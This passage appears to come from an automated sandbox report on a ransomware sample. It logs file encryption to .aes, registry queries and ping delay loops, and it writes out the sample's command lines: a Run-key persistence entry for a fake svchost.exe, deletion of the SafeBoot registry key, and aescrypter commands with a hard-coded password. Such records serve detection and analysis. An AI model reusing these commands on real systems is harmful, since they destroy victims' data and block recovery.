| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\ja.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGATNGET.XML.aes | N/A | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QP.XML.aes | N/A | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.aes | N/A | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL027.XML.aes | N/A | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML.aes | N/A | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.aes | N/A | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.aes | N/A | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.aes | N/A | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT.aes | N/A | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.aes | N/A | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes | C:\ProgramData\local\aescrypter.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\local\aescrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe
"C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe"
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -i
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -i
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -i
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -i
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -s
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -s
C:\Windows\SysWOW64\ucsvcsh.exe
C:\Windows\SysWOW64\ucsvcsh.exe
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\dcomcnfgui.exe
C:\Windows\SysWOW64\dcomcnfgui.exe
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -i
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -i
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\Windows\SysWOW64\REG.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\ProgramData\local\svchost.exe" /f
C:\Windows\SysWOW64\reg.exe
reg delete HKLM\System\CurrentControlSet\Control\SafeBoot /f
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
